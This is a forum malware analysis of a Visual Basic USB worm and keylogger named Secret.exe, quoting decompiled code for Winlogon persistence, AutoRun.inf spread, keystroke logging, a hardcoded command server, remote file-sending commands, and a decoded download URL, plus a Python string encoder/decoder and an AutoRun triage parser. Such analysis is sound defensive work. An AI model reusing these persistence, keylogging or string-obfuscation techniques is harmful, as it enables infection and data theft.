Admin Administrator
Posts: 877 Join date: 24/07/2010
Subject: [Analysis] Virus Secret.exe (PhimNguoiLon) Sun Mar 06, 2011 10:58 pm
Truly disappointing: DungCoi has come across at least 4 variants of this virus, and hardly anything has changed. Does its author never get tired of rehashing the same thing? Using VB Decompiler, the following noteworthy pieces stand out:
The project consists of 2 forms: Form1 and Form2
Form1 contains: the basic operations of the virus
loc_412533: If CBool((Me.global_88 = "Saturday") Or (Me.global_88 = "Tuesday")) Then '412595
loc_412544: var_AC = CVar(Unknown_40F54C(Me.global_88, CLng(Me.global_72), &H0, &H0, Me.global_72, "", "", "", "") & "\kdcoms32.dll") 'String
loc_412553: If Not (Unknown_40F1FC(var_AC)) Then '41256C
loc_412564: Timer4.Enabled = &HFF
loc_41256C: End If
On Saturday or Tuesday, Timer4 is set to run (virus update)
loc_40F2B1: LitStr "\userinit.exe"
....
loc_40F2C2: LitStr "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
loc_410A66: LitStr "\system32\system.exe"
loc_41207D: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe", &H0)
loc_4120B7: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", Unknown_40F54C() & "\system32\userinit.exe,")
loc_4121A3: var_AC = CVar(Unknown_40F54C("") & "\kdcoms.dll") 'String
loc_4121B1: If Unknown_40F1FC(var_AC) Then '4121FA
loc_4121CD: var_C8 = Unknown_40F54C() & "\kdcoms.dll"
loc_4121D0: ext_401090
loc_4121EC: var_AC = CVar(Unknown_40F54C("", &H0) & "\kdcoms.dll") 'String
loc_4121EF: ext_401030
loc_4121FA: End If
Private Sub Timer4_Timer() '4101D0
'Data Table: 40BD20
loc_4100D4: On Error GoTo 0
loc_4100E5: Timer4.Enabled = &H0
loc_4100FB: var_9C = CVar(Unknown_40F54C() & "\kdcoms32.dll") 'String
loc_410109: If Unknown_40F1FC(var_9C) Then '4101CA
loc_41011C: If (Me.global_88 = "Tuesday") Then '410174
loc_41014A: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8qjhxwurwn8orun|8}j|t7{j{", &H9))) & "\system32\task.exe") 'String
loc_410158: Call var_88.DL1.Address_4165C0
loc_410171: GoTo loc_4101C8
loc_410174: End If
loc_4101A1: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8yq~xwp6qxwp8orun|8}j|t7{j{", &H9)), var_C8) & "\system32\task.exe") 'String
loc_4101AF: Call var_88.DL1.Address_4165C0
loc_4101C8: ' Referenced from: 410171
loc_4101CA: End If
loc_4101CE: Exit Sub
End Sub
Function Decode:
Public Function Decode(Data, Depth) '40FD1C
'Data Table: 40BD20
loc_40FC5A: On Error GoTo 0
loc_40FC69: For var_9A = &H1 To CInt(Len(Data)): var_96 = var_9A 'Integer
loc_40FC71: var_BC = 1
loc_40FC82: var_8C = ext_401018
loc_40FC92: var_8E = ext_401004
loc_40FC9D: If (Depth = &H0) Then '40FCA7
loc_40FCA4: Depth = &H28
loc_40FCA7: End If
loc_40FCB0: If (Depth > 254) Then '40FCBB
loc_40FCB8: Depth = 254
loc_40FCBB: End If
loc_40FCCF: If ((var_8E - Depth) < &H0) Then '40FCDE
loc_40FCDB: var_8E = (var_8E + 255)
loc_40FCDE: End If
loc_40FCE7: ext_401054
loc_40FCFF: var_94 = var_94 & CStr("")
loc_40FD07: Next var_9A 'Integer
loc_40FD11: var_88 = var_94
loc_40FD16: Result = arg_14: Exit Sub
End Function
If you have ever seen this function in some source code before, you will recognize it right away; the original code:
Public Function Decode(Data As String, Optional Depth As Integer) As String
    Dim TempChar As String
    Dim TempAsc As Integer
    Dim NewData As String
    Dim vChar As Integer

    For vChar = 1 To Len(Data)
        TempChar = Mid$(Data, vChar, 1)
        TempAsc = Asc(TempChar)
        If Depth = 0 Then Depth = 40
        If Depth > 254 Then Depth = 254
        TempAsc = TempAsc - Depth
        If TempAsc < 0 Then TempAsc = TempAsc + 255
        TempChar = Chr(TempAsc)
        NewData = NewData & TempChar
    Next vChar
    Decode = NewData
End Function
Decoding the string q}}yC88orun|7v‚xyn{j7lxv8qjhxwurwn8orun|8}j|t7{j{ gives http://files.myopera.com/hav_online/files/task.rar
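As an added example (not code from the post or from the sample's author), the same Decode routine re-implemented in Python over raw ANSI bytes, with an inverse that is my own assumption; it decodes the second URL string from Timer4_Timer (the "‚" there is byte 0x82, and the stray space shown in the decompiler line is taken to be an extraction artifact) and shows why such strings contain bytes that do not survive being pasted as text.

```python
# Added example: Python re-implementation of the sample's Decode() routine.
# VB6 Asc()/Chr() work on ANSI byte values, so both helpers operate on bytes.

def vb_decode(data: bytes, depth: int = 0) -> bytes:
    """Mirror of the recovered Decode(): shift each byte down by Depth.
    Depth defaults to 40 and is capped at 254; a negative result wraps by
    adding 255 (sic: 255, not 256, so 0x00 and 0xFF decode to the same byte)."""
    if depth == 0:
        depth = 40
    if depth > 254:
        depth = 254
    out = bytearray()
    for b in data:
        v = b - depth
        if v < 0:
            v += 255
        out.append(v)
    return bytes(out)


def vb_encode(plain: bytes, depth: int = 0) -> bytes:
    """Inverse of vb_decode (assumed here; not part of the sample): shift up,
    wrapping by subtracting 255, so the round trip holds for bytes 0..254."""
    if depth == 0:
        depth = 40
    if depth > 254:
        depth = 254
    out = bytearray()
    for v in plain:
        b = v + depth
        if b > 255:
            b -= 255
        out.append(b)
    return bytes(out)


# Second URL string passed to Decode() in Timer4_Timer; byte 0x82 is the
# character the forum rendered as "‚" (cp1252). The stray space in the
# decompiler line is assumed to be an extraction artifact and is omitted.
ENCODED_TASK_URL = b"q}}yC88orun|7v\x82xyn{j7lxv8yq~xwp6qxwp8orun|8}j|t7{j{"
DEPTH = 9


def decode_task_url() -> str:
    return vb_decode(ENCODED_TASK_URL, DEPTH).decode("latin-1")


def unprintable_bytes(plain: bytes, depth: int = DEPTH) -> list:
    """Encoded bytes outside printable ASCII: these are lost or mangled when
    the decompiler string is pasted as text (e.g. 'v' + 9 = 0x7F, DEL)."""
    return [b for b in vb_encode(plain, depth) if b < 0x20 or b > 0x7E]
```

Encoding "hav_online" with depth 9 yields a 0x7F byte for the "v", which is why the first string as quoted in the post decodes to "ha_online" rather than "hav_online".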
loc_41141B: var_1AC = var_17C And (var_17C <> "A")
loc_41142A: ext_401088
loc_411435: ext_40102C
loc_41145A: If CBool(var_1CC And (var_1CC <> "B")) Then '411B9C
loc_411461: var_86 = &HFF
loc_411477: var_15C = var_DC & "\" & "Secret.exe"
loc_41147F: VarLateMemCallLdVar
loc_411496: If CBool(Not var_9C) Then '41154F
loc_4114E2: var_21C = CStr(var_DC & "\" & "Secret.exe")
loc_4114FB: var_218 = App.Path & "\" & App.EXEName & ".exe"
loc_4114FE: ext_401070
loc_41153C: var_204 = CStr(var_DC & "\" & "Secret.exe")
loc_411540: ext_401090
loc_41154F: End If
loc_41155B: var_12C = var_DC & "\AutoRun.inf"
loc_411563: VarLateMemCallLdVar
loc_411574: If CBool(var_9C) Then '4115AF
loc_41158A: var_204 = CStr(var_DC & "\AutoRun.inf")
loc_41158E: ext_401090
loc_4115A3: var_12C = var_DC & "\AutoRun.inf"
loc_4115A7: ext_401030
loc_4115AF: End If
loc_4115C7: Open CStr(var_DC & "\AutoRun.inf") For Output As &H1 Len = &HFF
loc_4115D8: Print &H1, "[AutoRun]"
loc_4115E5: Print &H1, "open=Secret.exe"
loc_4115F2: Print &H1, ";shell\open=Open(&O)"
loc_4115FF: Print &H1, "shell\open\Command=Secret.exe"
loc_41160C: Print &H1, "shell\open\Default=1"
loc_411619: Print &H1, ";shell\explore=Manager(&X)"
loc_411626: Print &H1, "shell\explore\Command=Secret.exe"
loc_411630: Close &H1
loc_411645: var_204 = CStr(var_DC & "\AutoRun.inf")
Writes AutoRun.inf and Secret.exe to the USB drive.
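As an added triage example (not part of the post), a small Python parser for the AutoRun.inf the sample writes; it returns the [AutoRun] entries that would launch a program, so a removable drive can be checked before anything on it is opened. The sample input is reconstructed from the Print statements above.

```python
# Added example: list the AutoRun.inf entries that launch a program.
# Sample input reconstructed from the Print statements in the decompiled code.

SAMPLE_AUTORUN_INF = """[AutoRun]
open=Secret.exe
;shell\\open=Open(&O)
shell\\open\\Command=Secret.exe
shell\\open\\Default=1
;shell\\explore=Manager(&X)
shell\\explore\\Command=Secret.exe
"""


def parse_autorun_inf(text: str) -> dict:
    """Minimal INI parser: {section: {lowercased key: value}}.
    Lines starting with ';' are comments, as in the file the sample writes."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def autorun_launch_targets(text: str) -> dict:
    """Return the [AutoRun] keys that execute a file: 'open', 'shellexecute'
    and any 'shell\\<verb>\\command' entry (verb labels and 'default' are not)."""
    autorun = parse_autorun_inf(text).get("autorun", {})
    targets = {}
    for key, value in autorun.items():
        is_verb_cmd = key.startswith("shell\\") and key.endswith("\\command")
        if key in ("open", "shellexecute") or is_verb_cmd:
            targets[key] = value
    return targets


if __name__ == "__main__":
    for key, target in autorun_launch_targets(SAMPLE_AUTORUN_INF).items():
        print(f"{key} -> {target}")
```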
Module1: shows the keylogging operations.
Public Sub init() '410078
'Data Table: 40BD20
loc_40FFA0: On Error GoTo 0
loc_40FFB1: var_98 = CVar(Unknown_40F54C() & "\system32\MSWINSCK.OCX") 'String
loc_40FFC0: If Not (Unknown_40F1FC(var_98)) Then '410056
loc_410006: Open Unknown_40F54C() & "\system32\MSWINSCK.OCX" For Binary As &H1 Len = &HFF
loc_41001D: Put &H1, &H1, LoadResData(101, "CUSTOM")
loc_410025: Close &H1
loc_410044: ext_40103C
loc_410049: var_CC = CVar(%x2 & Unknown_40F54C("Regsvr32", &H2) & "\system32\MSWINSCK.OCX /s")
loc_410056: End If
loc_41006A: Load MemVar_416064
loc_410074: Exit Sub
End Sub
Overwrites MSWINSCK.OCX with the data in the resource
Form2 contains: the Trojan's control commands
Private Sub Timer1_Timer() '40F884
'Data Table: 40B764
loc_40F7F4: On Error GoTo 0
loc_40F805: Timer1.Enabled = &H0
loc_40F819: var_98 = var_88.@filesize@
loc_40F82A: If (CInt(var_98) <> &H7) Then '40F867
loc_40F839: call var_88..Address_40D1F0
loc_40F846: var_A8 = "scsd.ath.cx"
loc_40F84C: var_C8 = 6999
loc_40F85C: call var_88..Address_40D1E0
loc_40F867: End If
loc_40F877: var_88.Timer.Enabled = &HFF
loc_40F881: Exit Sub
End Sub
Connects to the server using the host and port above.
Private Sub ws_() '410D48
'Data Table: 40B764
loc_410B14: On Error GoTo 0
loc_410B32: Call var_9C.ws.Address_40BA0C
loc_410B57: If (InStr(&H1, "", "@chdirec@", &H0) <> &H0) Then '410BED
loc_410B79: var_88 = ext_401048
loc_410B81: ext_401050
loc_410B8E: ext_401068
loc_410BA4: Dir1.Path = CStr(var_BC)
loc_410BBE: ext_401068
loc_410BD4: File1.Path = CStr(var_BC)
loc_410BE8: Call sendinfo
loc_410BED: End If
loc_410C09: If (InStr(&H1, var_88, "@chdrv@", &H0) <> &H0) Then '410C9F
loc_410C2B: var_88 = ext_401048
loc_410C33: ext_40105C
loc_410C40: ext_401068
loc_410C56: Dir1.Path = CStr(var_BC)
loc_410C70: ext_401068
loc_410C86: File1.Path = CStr(var_BC)
loc_410C9A: Call sendinfo
loc_410C9F: End If
loc_410CBB: If (InStr(&H1, var_88, "@sendfile@", &H0) <> &H0) Then '410D1B
loc_410CC6: Me.global_72 = True
loc_410CEF: Me.global_52 = CVar(ext_401048)
loc_410CFA: Close &H1
loc_410D0D: Open CStr(Me.global_52) For Binary As &H1 Len = &HFF
loc_410D16: Call SendFile
loc_410D1B: End If
loc_410D37: If (InStr(&H1, var_88, "@cancel@", &H0) <> &H0) Then '410D44
loc_410D41: Me.global_104 = &HFF
loc_410D44: End If
loc_410D46: Exit Sub
End Sub
The virus uses the extracted MSWINSCK.OCX control to wait for packets and reply to them.
Private Sub Timer2_Timer() '411044
'Data Table: 40B764
loc_410D90: On Error GoTo 0
loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
loc_410DCA: If ((MemVar_416040 <> "") And (Len(MemVar_416040) > &H2)) Then '410E70
loc_410E07: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410E2F
loc_410E13: var_A0 = CVar("@yahoo@" & MemVar_416040) 'String
loc_410E21: call var_90..Address_0
loc_410E2F: End If
loc_410E46: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410E58: Print &H2, MemVar_416040
loc_410E62: Close &H2
loc_410E6F: Exit Sub
loc_410E70: End If
loc_410E8F: If (InStr(&H1, Me.global_68, "@enter@", &H0) <> &H0) Then '410F7F
loc_410EBA: Me.global_68 = ext_401048
loc_410ECE: If (Me.global_68 <> "") Then '410F7A
loc_410F0B: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410F36
loc_410F1A: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410F28: call var_90..Address_0
loc_410F36: End If
loc_410F4D: Open Unknown_40F54C("", Me.global_68, "@enter@", "", &H1, &HFFFFFFFF, &H1) & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_410F62: Print &H2, Me.global_68
loc_410F6C: Close &H2
loc_410F7A: End If
loc_410F7E: Exit Sub
loc_410F7F: End If
loc_410F90: If (Len(Me.global_68) > &H37) Then '41103C
loc_410FCD: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410FF8
loc_410FDC: var_A0 = CVar("@yahoo@" & Me.global_68) 'String
loc_410FEA: call var_90..Address_0
loc_410FF8: End If
loc_41100F: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF
loc_411024: Print &H2, Me.global_68
loc_41102E: Close &H2
loc_41103C: End If
loc_411040: Exit Sub
End Sub
After each Enter keystroke, the input typed before it is appended to the file kdcoms.dll
Module1: the keylogger hook function (called from Form2), through the following statement in Form2:
loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
The virus sample is not password-protected; anyone with AV installed will just have to deal with it
Source: vrvn